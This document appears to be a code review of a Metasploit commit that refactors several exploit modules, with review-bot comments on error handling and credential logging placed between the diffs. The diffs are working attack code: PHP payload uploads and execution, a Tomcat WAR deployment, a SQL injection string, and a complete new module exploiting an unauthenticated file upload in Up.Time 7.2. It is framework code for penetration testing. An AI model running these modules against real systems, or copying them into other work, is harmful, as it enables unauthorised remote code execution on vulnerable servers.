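Review bot: The regex at the 'Retrieving an initial JSESSIONID' step, `/JSESSIONID=([0-9A-F]*);/`, accepts an empty capture, so a `JSESSIONID=;` header yields `session_id = ""` and the module continues into authentication with a blank session. Using `+` instead of `*`, `/JSESSIONID=([0-9A-F]+);/`, rejects that case at the same line; the second `session_id = $1` assignment further down should get the same treatment if its regex (outside the hunk) has the same shape. As a point of style, this module reports failures with `print_error` followed by `return` while the other modules touched by this commit use `fail_with`, which also records a failure reason for the framework.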


@ -101,32 +101,31 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
base = target_uri.path base = target_uri.path
@peer = "#{rhost}:#{rport}"
@fname = rand_text_numeric(7) @fname = rand_text_numeric(7)
# upload PHP payload to userpictures/[fname].php # upload PHP payload to userpictures/[fname].php
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
php = %Q|<?php #{payload.encoded} ?>| php = %Q|<?php #{payload.encoded} ?>|
begin begin
res = upload(base, php) res = upload(base, php)
if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/ if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/
print_good("#{@peer} - File uploaded successfully") print_good("#{peer} - File uploaded successfully")
else else
fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed") fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
# retrieve and execute PHP payload # retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (userpictures/#{@fname}.php)") print_status("#{peer} - Executing payload (userpictures/#{@fname}.php)")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(base, 'userpictures', "#{@fname}.php") 'uri' => normalize_uri(base, 'userpictures', "#{@fname}.php")
}) })
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
end end
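Review bot: The response from the 'Executing payload' request is assigned to `res` but never examined, so a 404 or 500 on `userpictures/#{@fname}.php` produces no output at all, unlike the upload step just above which inspects the status. Adding `print_error("#{peer} - Executing payload failed") if res and res.code != 200` after the `rescue` block mirrors the sibling modules in this commit. If the response is intentionally ignored, drop the assignment instead so the unused variable does not suggest a check that is not there.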


@ -72,8 +72,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
@peer = "#{rhost}:#{rport}"
# #
# Init target path # Init target path
# #
@ -89,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
# #
# Upload payload # Upload payload
# #
print_status("#{@peer} - Uploading payload") print_status("#{peer} - Uploading payload")
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(base, "/includes/savepage.php"), 'uri' => normalize_uri(base, "/includes/savepage.php"),
'vars_get' => { 'vars_get' => {
@ -99,14 +97,14 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res if not res
print_error("#{@peer} - No response from server, will not continue.") print_error("#{peer} - No response from server, will not continue.")
return return
end end
# #
# Run payload # Run payload
# #
print_status("#{@peer} - Requesting '#{php_fname}'") print_status("#{peer} - Requesting '#{php_fname}'")
send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) }) send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) })
handler handler
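Review bot: The `savepage.php` upload response is only checked for `nil` at `if not res`, so any HTTP error status still leads straight to 'Requesting' the payload file and to `handler`. If the application answers a rejected save with a non-200 status (not visible here, confirm against the target), `unless res and res.code == 200` at that line would catch it; otherwise matching an expected body fragment, as the other modules in this commit do, is the more reliable check. The start of `exploit` is in this section's first hunk, but the middle of the method is cut out.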


@ -69,9 +69,8 @@ class Metasploit4 < Msf::Exploit::Remote
end end
def check def check
@peer = "#{rhost}:#{rport}"
fingerprint = rand_text_alpha(5) fingerprint = rand_text_alpha(5)
print_status("#{@peer} - Sending check...") print_status("#{peer} - Sending check...")
begin begin
res = http_send_raw(fingerprint) res = http_send_raw(fingerprint)
rescue Rex::ConnectionError rescue Rex::ConnectionError
@ -91,8 +90,7 @@ class Metasploit4 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}" print_status("#{peer} - Sending payload...")
print_status("#{@peer} - Sending payload...")
http_send_cmd(payload.encoded) http_send_cmd(payload.encoded)
end end


@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
# If we don't get a cookie, bail! # If we don't get a cookie, bail!
if res and res.headers['Set-Cookie'] =~ /(PHPVolunteerManagent=\w+);*/ if res and res.headers['Set-Cookie'] =~ /(PHPVolunteerManagent=\w+);*/
cookie = $1 cookie = $1
vprint_status("#{@peer} - Found cookie: #{cookie}") vprint_status("#{peer} - Found cookie: #{cookie}")
else else
return nil return nil
end end
@ -189,56 +189,54 @@ class Metasploit3 < Msf::Exploit::Remote
base = normalize_uri(target_uri.path) base = normalize_uri(target_uri.path)
base << '/' if base[-1, 1] != '/' base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
# Login # Login
username = datastore['USERNAME'] username = datastore['USERNAME']
password = datastore['PASSWORD'] password = datastore['PASSWORD']
cookie = login(base, username, password) cookie = login(base, username, password)
if cookie.nil? if cookie.nil?
print_error("#{@peer} - Login failed with \"#{username}:#{password}\"") print_error("#{peer} - Login failed with \"#{username}:#{password}\"")
return return
end end
print_status("#{@peer} - Login successful with #{username}:#{password}") print_status("#{peer} - Login successful with #{username}:#{password}")
# Take a snapshot of the uploads directory # Take a snapshot of the uploads directory
# Viewing this doesn't actually require the user to login first, # Viewing this doesn't actually require the user to login first,
# but we supply the cookie anyway to act more like a real user. # but we supply the cookie anyway to act more like a real user.
print_status("#{@peer} - Enumerating all the uploads...") print_status("#{peer} - Enumerating all the uploads...")
before = peek_uploads(base, cookie) before = peek_uploads(base, cookie)
if before.nil? if before.nil?
print_error("#{@peer} - Unable to enumerate original uploads") print_error("#{peer} - Unable to enumerate original uploads")
return return
end end
# Upload our PHP shell # Upload our PHP shell
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
fname = rand_text_alpha(rand(10)+6) + '.php' fname = rand_text_alpha(rand(10)+6) + '.php'
desc = rand_text_alpha(rand(10)+5) desc = rand_text_alpha(rand(10)+5)
php = %Q|<?php #{payload.encoded} ?>| php = %Q|<?php #{payload.encoded} ?>|
res = upload(base, cookie, fname, php, desc) res = upload(base, cookie, fname, php, desc)
if res.nil? or res.body !~ /The file was successfuly uploaded/ if res.nil? or res.body !~ /The file was successfuly uploaded/
print_error("#{@peer} - Failed to upload our file") print_error("#{peer} - Failed to upload our file")
return return
end end
# Now that we've uploaded our shell, let's take another snapshot # Now that we've uploaded our shell, let's take another snapshot
# of the uploads directory. # of the uploads directory.
print_status("#{@peer} - Enumerating new uploads...") print_status("#{peer} - Enumerating new uploads...")
after = peek_uploads(base, cookie) after = peek_uploads(base, cookie)
if after.nil? if after.nil?
print_error("#{@peer} - Unable to enumerate latest uploads") print_error("#{peer} - Unable to enumerate latest uploads")
return return
end end
# Find the filename of our uploaded shell # Find the filename of our uploaded shell
files = get_my_file(before.body, after.body) files = get_my_file(before.body, after.body)
if files.empty? if files.empty?
print_error("#{@peer} - No new file(s) found. The upload probably failed.") print_error("#{peer} - No new file(s) found. The upload probably failed.")
return return
else else
vprint_status("#{@peer} - Found these new files: #{files.inspect}") vprint_status("#{peer} - Found these new files: #{files.inspect}")
end end
# There might be more than 1 new file, at least execute the first 10 # There might be more than 1 new file, at least execute the first 10
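Review bot: Both login messages print the password in clear, `print_error("#{peer} - Login failed with \"#{username}:#{password}\"")` and `print_status("#{peer} - Login successful with #{username}:#{password}")`, so the credential ends up in console output and in whatever log or database the framework persists that output to. Printing only the username, or moving the credential pair behind `vprint_status`, keeps the useful information while reducing what gets stored. The same pattern appears in two later sections of this commit, `Attempt to login with '#{user}:#{pass}'` and `Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'`, and the same remedy applies there. The enclosing `exploit` method starts outside this hunk.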


@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
@clean_files.each do |f| @clean_files.each do |f|
print_warning("#{@peer} - Removing: #{f}") print_warning("#{peer} - Removing: #{f}")
begin begin
if cli.type == 'meterpreter' if cli.type == 'meterpreter'
cli.fs.file.rm(f) cli.fs.file.rm(f)
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
cli.shell_command_token("rm #{f}") cli.shell_command_token("rm #{f}")
end end
rescue ::Exception => e rescue ::Exception => e
print_error("#{@peer} - Unable to remove #{f}: #{e.message}") print_error("#{peer} - Unable to remove #{f}: #{e.message}")
end end
end end
end end
@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0] cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0]
# Get user data # Get user data
vprint_status("#{@peer} - Enumerating user data") vprint_status("#{peer} - Enumerating user data")
res = send_request_raw({ res = send_request_raw({
'uri' => "#{base}/index.php/home/myAccount", 'uri' => "#{base}/index.php/home/myAccount",
'cookie' => cookie 'cookie' => cookie
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
return {} if not res return {} if not res
if res.code == 404 if res.code == 404
print_error("#{@peer} - #{username} does not actually have a 'myAccount' page") print_error("#{peer} - #{username} does not actually have a 'myAccount' page")
return {} return {}
end end
@ -208,35 +208,33 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res if not res
print_error("#{@peer} - Unable to request the file") print_error("#{peer} - Unable to request the file")
return return
end end
fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || '' fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || ''
if fname.empty? if fname.empty?
print_error("#{@peer} - Unable to extract the real filename") print_error("#{peer} - Unable to extract the real filename")
return return
end end
# Now that we have the filename, request it # Now that we have the filename, request it
print_status("#{@peer} - Uploaded file was renmaed as '#{fname}'") print_status("#{peer} - Uploaded file was renmaed as '#{fname}'")
send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"}) send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"})
handler handler
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path) uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/' uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.") base = File.dirname("#{uri}.")
user = datastore['USERNAME'] user = datastore['USERNAME']
pass = datastore['PASSWORD'] pass = datastore['PASSWORD']
print_status("#{@peer} - Attempt to login with '#{user}:#{pass}'") print_status("#{peer} - Attempt to login with '#{user}:#{pass}'")
opts = login(base, user, pass) opts = login(base, user, pass)
if opts.empty? if opts.empty?
print_error("#{@peer} - Login unsuccessful") print_error("#{peer} - Login unsuccessful")
return return
end end
@ -253,7 +251,7 @@ class Metasploit3 < Msf::Exploit::Remote
p = get_write_exec_payload("/tmp/#{bin_name}", bin) p = get_write_exec_payload("/tmp/#{bin_name}", bin)
end end
print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...") print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
opts = opts.merge({ opts = opts.merge({
'username' => user.scan(/^(.+)\@.+/).flatten[0] || '', 'username' => user.scan(/^(.+)\@.+/).flatten[0] || '',
'email' => user, 'email' => user,
@ -262,11 +260,11 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
uploader = upload_php(base, opts) uploader = upload_php(base, opts)
if not uploader if not uploader
print_error("#{@peer} - Unable to upload") print_error("#{peer} - Unable to upload")
return return
end end
print_status("#{@peer} - Executing '#{php_fname}'") print_status("#{peer} - Executing '#{php_fname}'")
exec_php(base, opts) exec_php(base, opts)
end end
end end
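Review bot: In the helper that extracts the session cookie, `cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0]` leaves `cookie` as `nil` when the header does not match, and the following 'Enumerating user data' request is then sent with `'cookie' => nil` instead of returning early. Adding `return {} if cookie.nil?` directly after that line is consistent with the `return {} if not res` the same helper already uses for a missing response. The helper's signature is outside the hunk, so its name is only inferred from the `opts = login(base, user, pass)` call in `exploit`.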


@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
post_data = data.to_s post_data = data.to_s
post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...") print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => "#{base}/admin/manage.php", 'uri' => "#{base}/admin/manage.php",
@ -122,15 +122,15 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res if not res
print_error("#{@peer} - No response from host") print_error("#{peer} - No response from host")
return return
end end
target_path = "#{base}/blogs/download/uploads/#{php_fname}" target_path = "#{base}/blogs/download/uploads/#{php_fname}"
print_status("#{@peer} - Requesting '#{target_path}'...") print_status("#{peer} - Requesting '#{target_path}'...")
res = send_request_raw({'uri'=>target_path}) res = send_request_raw({'uri'=>target_path})
if res and res.code == 404 if res and res.code == 404
print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}") print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}")
return return
end end
@ -139,17 +139,15 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
@peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path) uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/' uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.") base = File.dirname("#{uri}.")
print_status("#{@peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") print_status("#{peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
cookie = do_login(base) cookie = do_login(base)
if cookie.empty? if cookie.empty?
print_error("#{@peer} - Unable to login") print_error("#{peer} - Unable to login")
return return
end end
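Review bot: The check after the 'Requesting' step, `if res and res.code == 404`, treats a `nil` response (no reply at all) as success, because the condition is false for `nil` and execution continues past the hunk. `if res.nil? or res.code == 404` covers both cases; the message's `#{res.code.to_s}` then needs a guard such as `#{res ? res.code : 'no response'}`. The enclosing method begins before this hunk.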


@ -159,16 +159,14 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
# Get Tomcat installation path # Get Tomcat installation path
print_status("#{@peer} - Retrieving Tomcat installation path...") print_status("#{peer} - Retrieving Tomcat installation path...")
if install_path.nil? if install_path.nil?
fail_with(Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path") fail_with(Failure::NotVulnerable, "#{peer} - Unable to retrieve the Tomcat installation path")
end end
print_good("#{@peer} - Tomcat installed on #{install_path}") print_good("#{peer} - Tomcat installed on #{install_path}")
if target['Platform'] == "java" if target['Platform'] == "java"
exploit_java exploit_java
@ -178,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit_java def exploit_java
print_status("#{@peer} - Uploading WAR file") print_status("#{peer} - Uploading WAR file")
app_base = rand_text_alphanumeric(4+rand(32-4)) app_base = rand_text_alphanumeric(4+rand(32-4))
war = payload.encoded_war({ :app_name => app_base }).to_s war = payload.encoded_war({ :app_name => app_base }).to_s
@ -195,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote
select(nil, nil, nil, 2) select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war # Now make a request to trigger the newly deployed war
print_status("#{@peer} - Attempting to launch payload in deployed WAR...") print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
@ -209,7 +207,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit_native def exploit_native
print_status("#{@peer} - Uploading executable file") print_status("#{peer} - Uploading executable file")
exe = payload.encoded_exe exe = payload.encoded_exe
exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8)) exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8))
if target['Platform'] == "win" if target['Platform'] == "win"
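Review bot: `install_path` is called three times in this section (the `nil?` test, the `print_good`, and `path_join(install_path, ...)` in `exploit_native`); if it is a method that issues a request or parses a response on each call (its definition is outside the hunk, confirm), the result should be captured once, e.g. `path = install_path` before the `nil?` check, and the local reused. If it is memoized, a short comment at the first call site saying so would spare the next reader the same question. `exploit_native` continues past the end of this section.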


@ -152,34 +152,34 @@ class Metasploit3 < Msf::Exploit::Remote
base = normalize_uri(target_uri.path) base = normalize_uri(target_uri.path)
base << '/' if base[-1, 1] != '/' base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
datastore['COOKIE'] = "PHPSESSID="+rand_text_alpha_lower(26)+";" datastore['COOKIE'] = "PHPSESSID="+rand_text_alpha_lower(26)+";"
# register an account # register an account
user = rand_text_alphanumeric(rand(10)+6) user = rand_text_alphanumeric(rand(10)+6)
print_status("#{@peer} - Registering user (#{user})") print_status("#{peer} - Registering user (#{user})")
res = register(base, user, user) res = register(base, user, user)
if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/ if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/
print_status("#{@peer} - Registered successfully") print_status("#{peer} - Registered successfully")
else else
print_error("#{@peer} - Registration failed") print_error("#{peer} - Registration failed")
return return
end end
# login # login
print_status("#{@peer} - Authenticating user (#{user})") print_status("#{peer} - Authenticating user (#{user})")
res = login(base, user, user) res = login(base, user, user)
if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/ if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/
print_status("#{@peer} - Authenticated successfully") print_status("#{peer} - Authenticated successfully")
else else
print_error("#{@peer} - Authentication failed") print_error("#{peer} - Authentication failed")
return return
end end
# set id and table name # set id and table name
id = rand(1000)+1 id = rand(1000)+1
table = 'nodes_hierarchy' table = 'nodes_hierarchy'
print_status("#{@peer} - Setting id (#{id}) and table name (#{table})") print_status("#{peer} - Setting id (#{id}) and table name (#{table})")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
@ -187,35 +187,35 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => datastore['COOKIE'], 'cookie' => datastore['COOKIE'],
}) })
if res and res.code == 200 if res and res.code == 200
print_status("#{@peer} - Setting id and table name successfully") print_status("#{peer} - Setting id and table name successfully")
else else
print_error("#{@peer} - Setting id and table name failed") print_error("#{peer} - Setting id and table name failed")
return return
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
return return
end end
# upload PHP payload to ./upload_area/nodes_hierarchy/[id]/ # upload PHP payload to ./upload_area/nodes_hierarchy/[id]/
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
fname = rand_text_alphanumeric(rand(10)+6) + '.php' fname = rand_text_alphanumeric(rand(10)+6) + '.php'
php = %Q|<?php #{payload.encoded} ?>| php = %Q|<?php #{payload.encoded} ?>|
begin begin
res = upload(base, fname, php) res = upload(base, fname, php)
if res and res.code == 200 and res.body =~ /<p>File uploaded<\/p>/ if res and res.code == 200 and res.body =~ /<p>File uploaded<\/p>/
print_good("#{@peer} - File uploaded successfully") print_good("#{peer} - File uploaded successfully")
else else
print_error("#{@peer} - Uploading PHP payload failed") print_error("#{peer} - Uploading PHP payload failed")
return return
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
return return
end end
# attempt to retrieve real file name from directory index # attempt to retrieve real file name from directory index
print_status("#{@peer} - Retrieving real file name from directory index.") print_status("#{peer} - Retrieving real file name from directory index.")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
@ -223,19 +223,19 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
@token = $1 @token = $1
print_good("#{@peer} - Successfully retrieved file name (#{@token})") print_good("#{peer} - Successfully retrieved file name (#{@token})")
else else
print_error("#{@peer} - Could not retrieve file name from directory index.") print_error("#{peer} - Could not retrieve file name from directory index.")
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
return return
end end
# attempt to retrieve real file name from the database # attempt to retrieve real file name from the database
if @token.nil? if @token.nil?
print_status("#{@peer} - Retrieving real file name from the database.") print_status("#{peer} - Retrieving real file name from the database.")
sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--" sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
begin begin
res = send_request_cgi({ res = send_request_cgi({
@ -245,26 +245,26 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
@token = $1 @token = $1
print_good("#{@peer} - Successfully retrieved file name (#{@token})") print_good("#{peer} - Successfully retrieved file name (#{@token})")
else else
print_error("#{@peer} - Could not retrieve file name from the database.") print_error("#{peer} - Could not retrieve file name from the database.")
return return
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
return return
end end
end end
# retrieve and execute PHP payload # retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (#{@token}.php)") print_status("#{peer} - Executing payload (#{@token}.php)")
begin begin
send_request_cgi({ send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php") 'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php")
}) })
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed") print_error("#{peer} - Connection failed")
return return
end end


@ -0,0 +1,99 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Up.Time Monitoring Station post2file.php Arbitrary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability found within the Up.Time
monitoring server 7.2 and below. A malicious entity can upload a PHP file into the
webroot without authentication, leading to arbitrary code execution.
},
'Author' =>
[
'Denis Andzakovic <denis.andzakovic[at]security-assessment.com>' # Vulnerability discoverey and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '100423' ],
[ 'BID', '64031'],
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ]
],
'Payload' =>
{
'Space' => 10000, # just a big enough number to fit any PHP payload
'DisableNops' => true
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Up.Time 7.2', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 19 2013'))
register_options([
OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),
Opt::RPORT(9999)
], self.class)
end
def check
uri = target_uri.path
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wizards', 'post2file.php')
})
if res and res.code == 500 and res.body.to_s =~ /<title><\/title>/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Uploading PHP to Up.Time server")
uri = target_uri.path
@payload_name = "#{rand_text_alpha(5)}.php"
php_payload = get_write_exec_payload(:unlink_self => true)
post_data = ({
"file_name" => @payload_name,
"script" => php_payload
})
print_status("#{peer} - Uploading payload #{@payload_name}")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wizards', 'post2file.php'),
'vars_post' => post_data,
})
unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
end
print_status("#{peer} - Executing payload #{@payload_name}")
res = send_request_cgi({
'uri' => normalize_uri(uri, 'wizards', @payload_name),
'method' => 'GET'
})
end
end
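Review bot: In `exploit` the response of the final GET for `wizards/#{@payload_name}` is stored in `res` and never examined, so a 404 or 500 at that step is silent and the module ends without saying whether the uploaded PHP ran; the dropper presumably removes itself only if it actually executes (`get_write_exec_payload(:unlink_self => true)`), so on failure a randomly named PHP file stays in `wizards/` with no hint to the operator. A nil response is normal when the payload blocks the request, so only an explicit non-200 should be reported: `print_error("#{peer} - Execution of #{@payload_name} returned #{res.code}; remove it from wizards/ manually") if res and res.code != 200`. The two consecutive "Uploading" status lines at the top of `exploit` could also be collapsed into the second one, which already names the file.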


@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.headers['Set-Cookie'] if res and res.headers['Set-Cookie']
cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0] cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
else else
fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue") fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue")
end end
cookie cookie
@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
login[name] = value login[name] = value
end end
else else
fail_with(Failure::Unknown, "#{@peer} - Unable to find the hidden fieldset required for login") fail_with(Failure::Unknown, "#{peer} - Unable to find the hidden fieldset required for login")
end end
# Add the rest of fields required for login # Add the rest of fields required for login
@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
cookie_cred = "#{cookie}; #{user}; #{pass}" cookie_cred = "#{cookie}; #{user}; #{pass}"
else else
cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}" cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
fail_with(Failure::Unknown, "#{@peer} - Unable to login with \"#{cred}\"") fail_with(Failure::Unknown, "#{peer} - Unable to login with \"#{cred}\"")
end end
return cookie_cred return cookie_cred
@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
fields[n] = v fields[n] = v
end end
else else
fail_with(Failure::Unknown, "#{@peer} - Cannot get necessary fields before posting a comment") fail_with(Failure::Unknown, "#{peer} - Cannot get necessary fields before posting a comment")
end end
# Generate enough URLs to trigger spam logging # Generate enough URLs to trigger spam logging
@ -206,18 +206,16 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
@peer = "#{rhost}:#{rport}"
@base = normalize_uri(target_uri.path) @base = normalize_uri(target_uri.path)
@base << '/' if @base[-1, 1] != '/' @base << '/' if @base[-1, 1] != '/'
print_status("#{@peer} - Getting cookie") print_status("#{peer} - Getting cookie")
cookie = get_cookie cookie = get_cookie
print_status("#{@peer} - Logging in") print_status("#{peer} - Logging in")
cred = login(cookie) cred = login(cookie)
print_status("#{@peer} - Triggering spam logging") print_status("#{peer} - Triggering spam logging")
inject_exec(cred) inject_exec(cred)
handler handler


@ -86,9 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}" print_status("#{peer} - Exploiting the preg_replace() to execute PHP code")
print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
